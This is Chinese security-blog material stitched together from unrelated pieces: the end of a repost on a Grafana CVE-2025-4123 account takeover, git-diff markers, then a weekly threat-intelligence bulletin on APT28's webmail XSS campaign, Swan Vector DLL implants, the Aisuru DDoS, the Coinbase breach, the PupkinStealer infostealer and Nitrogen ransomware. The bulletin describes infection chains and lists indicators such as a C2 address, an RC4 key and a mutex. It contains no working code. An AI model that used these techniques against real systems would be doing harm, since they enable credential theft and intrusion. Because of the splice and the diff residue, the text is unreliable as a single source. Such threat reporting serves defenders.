![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fpkakwHGVnYHqtaRNcFX6l1xuBcs1zBK3YRvVjSGiaOVicusfyicoxWpGQ/640?wx_fmt=png&from=appmsg "")
恶意 JavaScript 文件被执行,并允许我们更改受害者的电子邮件并重置他们的密码。
![file](https://mmbiz.qpic.cn/sz_mmbiz_png/hZj512NN8jkOicLibdIFad3KVzHv70ud4fhvP3bKTOKoj1NI6a2jFiaO5COw8NtdVpeU1q73nf2k2QO3ggicujxgOA/640?wx_fmt=png&from=appmsg "")
希望本文能给你更多启发~
原文https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
- END -
**加入星球,随时交流:**
**********会员统一定价128元/年0.35元/天)******
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/hZj512NN8jnMJtHJnShkTnh3vR3fmaqicPicANic6OEsobrpRjx5vG6mMTib1icuPmuG74h2bxC4eP6nMMzbs5QaSlw/640?wx_fmt=jpeg&from=appmsg "")
**感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~**

View File

@ -0,0 +1,238 @@
# 疑似俄罗斯APT28组织在全球攻击活动中利用0Day漏洞——每周威胁情报动态第223期 05.16-05.22
原创 BaizeSec 白泽安全实验室 2025-05-23 01:00
APT攻击
- 疑似俄罗斯
APT28
组织
在全球
攻击
活动中利用
0Day
漏洞
- Swan-Vector APT组织通过DLL植入技术针对台湾与日本发动网络攻击
攻击活动
- 知名网络安全博客
KrebsOnSecurity遭遇近超大规模DDoS攻击
数据泄露
- 加密货币交易平台
Coinbase数据泄露
影响
69,461名用户
恶意软件
- 新型
.NET恶意软件利用Telegram进行数据
窃取
勒索软件
- 新型勒索软件
Nitrogen
针对
美国、英国和加拿大的金融机构
展开攻击
APT攻击
疑似俄罗斯APT28组织在全球攻击活动中利用0Day漏洞
近期,网络安全厂商
ESET安全研究人员发现了一个名为“Operation RoundPress”的网络攻击活动。这场攻击活动背后极有可能是俄罗斯背景的APT组织
Sednit又称APT28在暗中操盘。
Sednit组织自2004年以来一直活跃在网络攻击领域其身影曾出现在2016年美国大选前夕的民主党全国委员会DNC黑客事件中也与俄罗斯情报机构GRU有着千丝万缕的联系。此外全球电视网络TV5Monde的黑客攻击、世界反兴奋剂机构WADA电子邮件泄露等一系列重大网络安全事件都被怀疑与该组织有关。
Operation RoundPress的攻击目标主要集中在东欧地区尤其是乌克兰、保加利亚、罗马尼亚等国家的政府机构和国防公司。这些目标大多与乌克兰战争相关例如乌克兰的政府机构、国防公司以及为乌克兰提供苏联时期武器的保加利亚和罗马尼亚国防企业。此外非洲、欧盟和南美洲的部分政府机构也未能幸免。
这场攻击的手法十分狡猾且技术含量颇高。攻击者通过发送含有跨站脚本(
XSS漏洞的网络钓鱼电子邮件来获取初始访问权限。2023年攻击者主要利用Roundcube中的CVE-2020-35730漏洞。到了2024年攻击者扩大了攻击范围开始针对Horde、MDaemon和Zimbra等其他网络邮件软件并且开始利用Roundcube中的CVE-2023-43770漏洞。其中MDaemon的漏洞CVE-2024-11182是一个0Day漏洞很可能是由
Sednit发现的。这些网络钓鱼电子邮件内容通常看起来无害包含新闻事件的内容并且会包含一些知名媒体的链接。恶意代码隐藏在电子邮件正文的HTML代码中用户无法直接看到。
攻击者发送的电子邮件在外观上与普通邮件无异,但一旦受害者在易受攻击的网络邮件客户端中打开这些邮件,恶意
JavaScript代码就会在浏览器窗口中执行。这些代码能够在受害者不知情的情况下窃取网络邮件凭据、联系人信息以及电子邮件内容并将这些敏感数据发送到攻击者控制的服务器。更令人担忧的是部分恶意软件样本能够创建Sieve规则将每封新收到的电子邮件自动转发到攻击者控制的邮箱地址从而实现长期的数据窃取。
这场攻击中,攻击者精心设计了多种恶意软件,以应对不同的网络邮件系统。例如,
SpyPress.HORDE专门针对Horde网络邮件通过创建隐藏的HTML输入元素来窃取凭据SpyPress.MDAEMON则更为复杂不仅能窃取凭据还能窃取联系人信息、登录历史记录、电子邮件消息甚至能够窃取双因素认证2FA密钥并创建应用程序密码以绕过2FA保护。在Roundcube邮件系统中攻击者使用的载荷名为SpyPress.ROUNDCUBE。该载荷不仅能够直接窃取用户在登录表单中输入的用户名和密码还通过创建一个iframe强制用户登出并重新登录同时在真实登录表单的提交按钮上设置回调函数进一步窃取用户重新输入的凭证。此外SpyPress.ROUNDCUBE还访问并窃取了用户的地址簿以及Roundcube的设置页面信息这些信息对于攻击者了解受害者的组织架构和系统配置至关重要。更为严重的是SpyPress.ROUNDCUBE还具备邮件窃取功能。它每两小时执行一次邮件窃取例程遍历用户的所有邮箱获取邮件ID并从服务器上获取邮件源码进行窃取。为了规避检测该载荷在连续窃取超过150封邮件后会主动暂停直到下次例程执行。在某些样本中SpyPress.ROUNDCUBE甚至创建了恶意的Sieve规则将所有收到的邮件副本发送到攻击者控制的邮箱地址实现了对受害者邮件系统的全面监控。
而在
Zimbra邮件系统中攻击者则使用了名为SpyPress.ZIMBRA的载荷。该载荷的凭证窃取功能与SpyPress.ROUNDCUBE类似但针对Zimbra邮件系统的输入字段名称进行了适应性调整。此外SpyPress.ZIMBRA还通过SOAP请求窃取了用户的联系人列表并窃取了包含各种配置和偏好值的ZmSetting全局变量内容。与SpyPress.ROUNDCUBE相似SpyPress.ZIMBRA也具备邮件窃取功能它每四小时执行一次邮件窃取例程遍历用户邮箱中的前80封邮件并通过SOAP请求获取邮件源码进行窃取。
![](https://mmbiz.qpic.cn/mmbiz_png/NpPydsaAMIPsqoAs2JD0J7eltc4quceIWCeGn2pwa2PT3oQjmwfebNSsmT86Lcc0tVoxCzsZySfFWRZR2mIYibA/640?wx_fmt=png&from=appmsg "")
 1 Operation RoundPress攻击链
参考链接:
https://www.welivesecurity.com/en/eset-research/operation-roundpress/
Swan-Vector APT组织通过DLL植入技术针对台湾与日本发动网络攻击
近日,网络安全厂商
Seqrite研究人员发现了一个名为“Swan Vector”组织的网络攻击行动该攻击活动主要针对中国台湾地区和日本的相关机构涉及教育机构及机械制造行业通过伪装成简历的诱饵文件实施攻击。
SWAN-VECTOR组织长期活跃于东亚地区以政府机构、科研单位及战略产业为主要攻击目标。在此次攻击中该组织通过精心设计的攻击链结合社会工程学手段与高度混淆的恶意DLL文件绕过传统安全防护体系实现了对目标系统的深度渗透。
2025年4月Seqrite研究人员发现了一个名为“歐買尬金流問題資料_20250413 (6).rar”的恶意压缩包其中包含一个恶意LNK文件和一个PNG格式的伪装文件。经分析这个PNG文件实际上是一个DLL植入物名为Pterois。此次攻击行动以教育机构和机械制造行业为目标通过发送伪装成简历的诱饵文件诱导受害者打开并执行恶意代码。
在感染链方面,呈现出多阶段的复杂特征。首先是恶意
LNK脚本阶段该脚本名为“詳細記載提領延遲問題及相關交易紀錄.pdf.lnk”创建时间为2025 - 03 - 04其作用是启动名为rundll32.exe的合法但常被滥用的程序LOLBins进而执行名为Pterois的恶意DLL植入物。此DLL植入物的导出函数Trpo带有一个特定参数“1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg”后续分析将揭示该参数在植入物中的作用机制。
接着进入恶意
Pterois植入物阶段Pterois最初以PNG文件形式存在在被rundll32.exe执行其导出函数Trpo时开始运行。该植入物具有两个主要功能一是通过访问进程环境块PEB遍历加载模块列表利用SDBM哈希算法对所需API进行解析此过程涉及对多个系统DLL如ntdll.dll、ucrtbase.dll、kernel32.dll等的API解析包括从基地址获取、解析导出表、计算哈希值并与目标哈希匹配等一系列操作二是对于某些DLL如iphlapi.dll、shell32.dll和WinHTTP.dll还采用定时器对象Timer Objects这种伪反分析技术来加载DLL最终解析所需API函数地址。同时该植入物从命令行参数中获取相关信息通过滥用Google Drive作为命令与控制C2服务器实施攻击先进行OAuth认证获取访问令牌再利用Google Drive API根据硬编码的文件ID下载恶意可执行文件、DLL以及配置文件到本地C:\Windows\Temp下载完成后通过CreateThread函数启动下载的诱饵文件和其他文件并最终执行自我删除操作以掩盖痕迹自我删除采用延迟执行技术通过创建cmd.exe进程ping localhost来确保文件句柄释放后再删除。
随后是恶意
Isurus植入物阶段Pterois下载的文件中包含一个名为PrintDialog.dll的恶意植入物Isurus其编译时间为2025-04-08 03:02:59 UTC。Isurus通过DLL-Sideloading技术利用合法Windows签名的PrintDialog.exe程序来运行自身。该植入物导出DllEntryPoint和DllGetActivationFactory两个函数其中DllGetActivationFactory为恶意函数。它同样采用API Hashing技术解析API通过遍历PEB定位DLL基地址解析导出表获取函数地址采用CRC32哈希算法。然后从ra.ini文件中提取并解密使用RC4密钥wquefbqwshellcode最后通过基于系统调用的执行技术在内存中直接执行shellcode。
最后是恶意
Cobalt Strike Shellcode阶段Isurus提取并执行的shellcode为加密格式经解密后发现是基于Cobalt Strike的beacon。提取的beacon配置显示其进程注入目标包括windir\syswow64\bootcfg.exe和windir\sysnative\bootcfg.exe等。此外还发现了与之相关的基础设施信息如C2服务器地址hxxps://52.199.49.4:7284以及一些HTTP请求相关的配置信息。这些信息表明威胁行为者利用Cobalt Strike作为入侵工具包的一部分。
在基础设施与溯源方面,威胁行为者使用
Google Drive作为C2框架从中泄露了敏感API密钥等大量细节。关联的Gmail地址为“swsanavector42@gmail.com”通过对该Google Drive账户的分析发现了与威胁行为者相关的文件列表包括之前分析的各个恶意文件以及其他未在野外使用的预定用于其他活动的文件。通过对植入物的技术分析发现其与多个APT组织存在相似之处。例如Pterois的DLL Sideloading技术与Winnti APT组织类似Isurus在代码库方面与Lazarus组织存在相似性且与APT10近期在日本和台湾的目标有部分重合。结合语言分析、植入物成熟度以及其他收集到的线索Seqrite以中等信心将该攻击组织归因于东亚地区。
![](https://mmbiz.qpic.cn/mmbiz_png/NpPydsaAMIPsqoAs2JD0J7eltc4quceI2DickO9yicJ2BiaSDuHxdnCGO6TmMve5qXIMf9hJJiawTGCneGgPXla3qg/640?wx_fmt=png&from=appmsg "")
 2 
Swan Vector
 攻击感染链
参考链接:
https://www.seqrite.com/blog/swan-vector-apt-targeting-taiwan-japan-dll-implants/
攻击活动
知名网络安全博客KrebsOnSecurity遭遇近超大规模DDoS攻击
KrebsOnSecurity是由著名网络安全专家布莱恩·克雷布斯Brian Krebs运营的博客网站长期致力于曝光各类网络犯罪活动、分析网络安全威胁并为公众和企业提供安全防护建议。2025年5月该博客网站遭遇了一场规模空前的分布式拒绝服务
DDoS攻击攻击流量峰值达到惊人的6.3Tbps每秒。该网站在过去曾多次成为黑客攻击的目标其中最为人熟知的是2016年由Mirai物联网僵尸网络发动的攻击当时导致KrebsOnSecurity网站中断服务近四天。此次6.3Tbps的DDoS攻击其规模是2016年Mirai攻击的十倍之多。
此次攻击的流量峰值达到
6.3Tbps这意味着在攻击期间每秒有超过6.3万亿比特的数据被恶意发送到KrebsOnSecurity的服务器试图通过海量流量淹没服务器使其无法正常响应合法用户的访问请求。根据报道此次攻击仅持续了不到一分钟但其强度之高足以对大多数网络服务提供商造成致命打击。谷歌安全工程师达米安·门舍尔Damian Menscher表示这是谷歌有史以来处理过的最大规模的DDoS攻击仅次于2025年4月Cloudflare抵御的一次6.5 Tbps 类似攻击。
经过与
Cloudflare的技术团队交流后门舍尔指出发动这两次攻击的僵尸网络都带有明显的Aisuru特征。Aisuru是一种相对较新的僵尸网络首次出现在不到一年前由全球范围内大量被入侵的物联网设备组成包括路由器、数字视频摄像头等。这些设备通常通过默认密码或软件漏洞被攻击者控制。
2024年8月Aisuru曾对一家大型游戏平台发动攻击随后短暂沉寂于2024年11月再次出现并增加了更多攻击能力与软件漏洞利用手段。2025年1月研究人员发现Aisuru已整合了Cambium Networks cnPilot路由器中一个未知的0Day漏洞。此次攻击中
Aisuru僵尸网络以每秒约5.85亿个数据包的速率向随机端口发送投掷大型UDP数据包其目的是为了压垮网络链路即互联网服务提供商ISP之间的连接通道。对于大多数公司而言如此规模的攻击足以使其网络服务瘫痪。
根据
FBI的调查Aisuru僵尸网络的运营者通过Telegram公开聊天频道推销其DDoS攻击服务提供不同层级的订阅套餐价格从每天150美元到每周600美元不等最高可提供每秒2Tbps的攻击流量。尽管Aisuru的运营者曾明确表示禁止攻击医疗设施、学校或政府网站但其实际攻击行为显然已突破道德底线。
Aisuru的背后人物之一被称为“Forky”其Telegram账号为“@yfork”。Forky自2021年起便在公开的DDoS相关Telegram频道中活跃其运营的DDoS服务域名多次被执法部门查封。2022年Forky宣布购买了已被FBI查封的DDoS服务域名stresser.best并在Telegram上发布相关链接。Forky声称自己居住在巴西年仅21岁同时运营着一家名为Botshield的DDoS防护公司和互联网服务提供商ISP。然而Forky对于其业务的真实性质以及客户群体始终闪烁其词并且拒绝透露Botshield是否为其他DDoS服务提供商提供防护。
尽管
Forky声称自己已退出非法DDoS行业多年但证据显示他仍在参与相关活动。Forky承认自己曾参与开发和推广Aisuru僵尸网络但声称目前仅是该网络团队的一名普通员工并且在两个月前因组建家庭而停止了僵尸网络的运营。Forky对KrebsOnSecurity的攻击表示否认但同时表示愿意配合调查却又未能提供任何实质性线索。
参考链接:
https://krebsonsecurity.com/2025/05/krebsonsecurity-hit-with-near-record-6-3-tbps-ddos/
数据泄露
加密货币交易平台Coinbase数据泄露影响69,461名用户
2025年5月全球知名的加密货币交易平台Coinbase遭遇了一起严重的数据泄露事件导致约69,461名用户的数据被非法获取。2025年5月11日Coinbase收到一封勒索邮件邮件中声称攻击者已经获取了部分用户数据和公司内部信息并要求Coinbase支付2,000万美元作为赎金。攻击者声称他们是通过贿赂海外支持团队的成员利用这些员工的合法访问权限
Coinbase的内部系统中提取了数据。
Coinbase在收到勒索邮件后迅速展开调查并确认此次数据泄露事件是一次有组织的攻击活动的一部分。该公司在过去的几个月中已经检测到支持人员未经授权访问数据的行为并立即终止了相关员工的权限加强了欺诈监控并通知了受影响的用户。尽管如此攻击者仍然成功获取了一些内部数据。
根据
Coinbase的披露此次泄露的数据包括
- 有限的公司数据(包括支持代理可以访问的文件、培训材料和通信记录);
- 用户的姓名、地址、电话号码和电子邮件地址;
- 部分社会安全号码(仅最后四位数字);
- 部分银行账户号码及一些银行账户标识符;
- 政府身份证件图像(如驾照、护照);
- 账户数据(包括余额快照和交易历史)。
值得注意的是,此次泄露并未涉及用户的密码、私钥或客户资金,这在一定程度上减轻了用户的直接损失风险。然而,泄露的个人信息仍然可能被用于恶意目的,例如身份盗窃或网络钓鱼攻击。
从技术角度来看,此次攻击事件凸显了内部威胁的严重性。攻击者通过贿赂海外支持人员,利用其合法的系统访问权限获取数据,这种攻击方式难以通过传统的网络安全防护措施检测和阻止。
Coinbase在发现未经授权的数据访问行为后迅速采取了一系列应对措施包括终止相关员工的权限、加强欺诈监控、通知受影响用户并与执法部门合作展开调查。
此次数据泄露事件对
Coinbase造成了巨大的经济和声誉损失。据估计Coinbase将因此次事件承担1.8亿至4亿美元的成本主要用于补救措施和用户赔偿。尽管Coinbase拒绝支付赎金但此次事件仍然引发了用户对平台安全性的担忧可能影响其未来的用户增长和市场信任度。
参考链接:
https://securityaffairs.com/178151/data-
breach/coinbase-data-breach-impacted-69461-individuals.html
恶意软件
新型.NET恶意软件利用Telegram进行数据窃取
近期,网络安全研究人员发现了一种名为
PupkinStealer的新型恶意软件它专门窃取敏感信息如网络浏览器密码和应用程序会话令牌并通过Telegram进行数据外泄。PupkinStealer在某些报告中也被称为PumpkinStealer首次被发现于2025年4月左右。尽管其公开披露是在2025年但有证据表明该恶意软件可能早在之前就已经在暗中开发或测试其代码借鉴了现有的开源窃取器。该恶意软件似乎起源于俄语网络犯罪圈子其用于外泄数据的Telegram机器人有一个俄语名字且嵌入的代码字符串“Coded by Ardent”指向了一个在该圈子中活动的开发者别名“Ardent”。攻击者的Telegram个人资料中甚至包含了俄语文本进一步证实了其来源。PupkinStealer的设计与开源的StormKitty窃取器一个同样使用Telegram的.NET信息窃取器相似这表明作者可能在此代码基础上进行了构建或从中汲取了灵感。
PupkinStealer的受害者范围广泛并非针对特定行业或地区而是任何可能被感染设备的Windows用户。它被描述为一种低复杂度、高影响力的信息窃取器具有广泛的可用性和易于定制的特点这使得它对寻求快速获利的网络犯罪分子极具吸引力。目前它已被一些技术水平较低的攻击者利用以获取凭证和数据以获取经济利益。受害者可能包括个人家庭用户和企业员工因为该恶意软件仅在受感染系统上搜索存储的密码、个人文件和消息账户。例如研究人员最近发现超过31,000个澳大利亚客户的银行密码在Telegram和暗网上传播这些密码都是直接从受恶意软件感染的PC上窃取的。这表明任何在机器上存储有价值凭证的人都可能是潜在的目标。
初始访问阶段,
PupkinStealer通常通过社会工程学手段进入受害者设备例如伪装成合法文件的特洛伊木马下载。尽管其确切的传播途径尚未被研究人员确认但很可能是通过网络钓鱼附件或破解软件包传播的。换句话说攻击者可能会通过伪装成合法文件例如将其捆绑在盗版软件中或伪装成文档来诱使用户执行恶意软件。在地下社区中技术不熟练的犯罪分子可以轻松获得
PupkinStealer并将其部署在垃圾邮件活动或恶意广告中因为其即用性很高。一旦用户被诱使运行PupkinStealer可执行文件恶意软件便在其系统上获得了初始立足点。
执行阶段,
PupkinStealer需要受害者在其Windows系统上执行一个恶意的.exe文件。该恶意软件是一个32位的.NET编译二进制文件通常命名为PupkinStealer.exe有时也被称为PlutoniumLoader.exe由于其AnyCPU配置它可以在32位和64位Windows上运行。当启动时该二进制文件由.NET公共语言运行时加载并立即调用其Main()方法该方法协调窃取器的活动。值得注意的是PupkinStealer的实现使用异步任务并行运行多个例程。执行时它同时启动五个任务一个用于窃取浏览器密码一个用于抓取桌面文件一个用于劫持Telegram会话一个用于窃取Discord令牌一个用于捕获屏幕截图。这种多线程设计使其能够非常快速地收集数据通常在短短几秒钟内完成整个窃取过程。总之PupkinStealer在主机上的执行非常简单用户双击或以其他方式运行dropper二进制文件然后该文件立即在其.NET运行时环境中执行其有效载荷代码。
维持阶段,
PupkinStealer在受感染系统上没有采用任何持久化机制。与许多创建自动运行注册表项或计划任务以在重启后存活的恶意软件家族不同PupkinStealer是一个“抢夺即走”的工具。它专注于在初次运行时进行一次性数据窃取然后退出不会留下持久的立足点。分析人员指出该恶意软件没有特定的反分析防御或持久化机制而是倾向于快速执行和低调行为。这意味着如果系统重启或进程被终止PupkinStealer不会自动重新启动。缺乏持久性很可能是为了减少恶意软件的足迹并避免某些检测机制的有意设计选择。
防御规避阶段,
PupkinStealer积极终止某些应用程序的进程以协助其操作并避免干扰。在尝试读取浏览器凭证数据库或消息应用程序文件之前恶意软件会搜索这些程序的任何运行进程并终止它们。例如它会枚举每个支持的浏览器Chrome、Edge、Opera等的进程名称并对每一个调用Process.Kill()。这是为了解锁浏览器的SQLite数据库文件这些文件存储密码通常在浏览器运行时被锁定。同样PupkinStealer会查找任何运行的Telegram进程并强制终止它以便释放tdata会话文件以便复制。通过终止这些进程恶意软件不仅确保它可以访问所需的数据而且可能还规避了某些检测——例如它避免了需要使用代码注入或挂钩来从活动内存中窃取凭证。
窃取凭据阶段是PupkinStealer的核心功能。它专门针对基于Chromium的网络浏览器如Google Chrome、Microsoft Edge、Opera、OperaGX、Brave和Vivaldi以检索保存的登录凭据。PupkinStealer定位每个浏览器的“Login Data”SQLite数据库存储保存的用户名和密码和相应的“Local State”文件包含加密密钥。然后它使用Chromium凭证API逻辑来解密密码。根据分析窃取器从数据库中加载加密的密码并使用来自Local State的密钥以及Windows DPAPIProtectedData调用来解密每个密码条目。此过程产生每个存储网站账户的明文凭据。PupkinStealer将窃取的浏览器密码输出到临时目录中的文本文件中每个浏览器一个例如Chrome.txt、Edge.txt。通过专注于浏览器PupkinStealer可以在不需要执行更高级技术如内存刮取的情况下收集大量账户密码。
数据外泄阶段,
PupkinStealer收集的数据包括浏览器密码、桌面文件、Telegram会话数据、Discord令牌以及屏幕截图。这些数据被压缩成一个ZIP文件并通过Telegram的Bot API发送给攻击者。PupkinStealer不使用传统的交互式命令与控制C2通道而是通过Telegram的Bot API进行通信。这种外泄方法具有匿名性、加密性和易于使用的特点使得攻击者能够在不被轻易发现的情况下接收被盗数据。
参考链接:
https://www.picussecurity.com/resource/blog/pupkinstealer-net-infostealer-using-telegram-for-data-theft
勒索软件
###
新型勒索软件Nitrogen针对美国、英国和加拿大的金融机构展开攻击
近期网络安全研究人员发现一种名为“Nitrogen”的勒索软件在全球范围内迅速崛起成为众多机构面临的重大威胁尤其是金融领域。Nitrogen勒索软件首次于2024年9月被发现因其复杂的攻击手段和极具破坏性的影响而迅速出名。该勒索软件通过加密关键数据并要求巨额赎金来解锁给受影响的组织带来了巨大的经济和运营压力。
Nitrogen的攻击手段复杂且极具隐蔽性。其攻击链通常从搜索引擎上的恶意广告活动开始诱导用户下载伪装成合法软件如AnyDesk、WinSCP或Cisco AnyConnect的特洛伊木马安装程序。一旦安装勒索软件会利用Cobalt Strike和Meterpreter等工具建立持久性横向移动并执行其加密负载。Nitrogen还会修改注册表键、计划任务以确保在系统重启后仍能保持活跃。它还会对网络系统进行彻底的侦察识别网络中的高价值目标以最大化攻击影响并采用先进的规避技术。
Nitrogen的主要受害者包括美国的SRP联邦信用社、加拿大的Red Barrels视频游戏开发商、Control Panels USA以及Kilgore Industries等。这些攻击不仅暴露了金融行业对这类攻击的脆弱性也凸显了Nitrogen勒索软件的高针对性和破坏力。例如Red Barrels有1.8TB的敏感数据被勒索,包括游戏源代码和内部文件,这对企业的运营和声誉造成了严重影响。
尽管关于
Nitrogen的公开信息有限但通过StreamScan的报告和ANY.RUN的动态分析我们可以了解到一些关键的入侵指标IOCs和攻击方法。Nitrogen创建了一个独特的互斥量nvxkjcv7yxctvgsdfjhv6esdvsx以确保勒索软件的唯一实例运行。它还利用了truesight.sys这是一个合法但可被利用的驱动程序用于禁用防病毒和端点检测工具。此外Nitrogen使用bcdedit.exe禁用Windows安全启动阻碍系统恢复。
参考链接:
https://hackread.com/nitrogen-ransomware-targets-financial-firms-us-uk-canada/
往期推荐
[LockBit勒索组织发布声明并重建泄露网站——每周威胁情报动态第166期2.23-2.29](http://mp.weixin.qq.com/s?__biz=MzI0MTE4ODY3Nw==&mid=2247492114&idx=1&sn=8d7c5643b4d7b9e6ba5fdb73db25f5ac&chksm=e90dc838de7a412e358185c880ff13f5960c816f47faef975adecc92aa229dd947eaed7c1543&scene=21#wechat_redirect)
[GoldFactory组织开发针对iOS系统的GoldPickaxe木马病毒——每周威胁情报动态第165期2.9-2.22](http://mp.weixin.qq.com/s?__biz=MzI0MTE4ODY3Nw==&mid=2247492108&idx=1&sn=9a94a877d19aae993613beabfed515b9&chksm=e90dc826de7a4130e9c14fbecc4bb470c785600d65f4eca984822a3772b801007188d753444b&scene=21#wechat_redirect)
[新APT组织APT-LY-1009针对亚美尼亚政府投递VenomRAT——每周威胁情报动态第164期02.02-02.07](http://mp.weixin.qq.com/s?__biz=MzI0MTE4ODY3Nw==&mid=2247492097&idx=1&sn=53ec18ecbac467ab6dddeef971e8630f&chksm=e90dc82bde7a413df05e08bc4d6136b60d4a339310cdb66a046cc0645bb90e447b8564e16180&scene=21#wechat_redirect)
[APT28组织对全球多个组织发起NTLMv2哈希中继攻击——每周威胁情报动态第163期01.26-02.01](http://mp.weixin.qq.com/s?__biz=MzI0MTE4ODY3Nw==&mid=2247492083&idx=1&sn=2c985de24dfa929181ba8e6ae63b02ab&chksm=e90dcbd9de7a42cf2f738cbe44a3859ab3f78636b84ef2b930dfc29ecbfc05542ae161ab4e16&scene=21#wechat_redirect)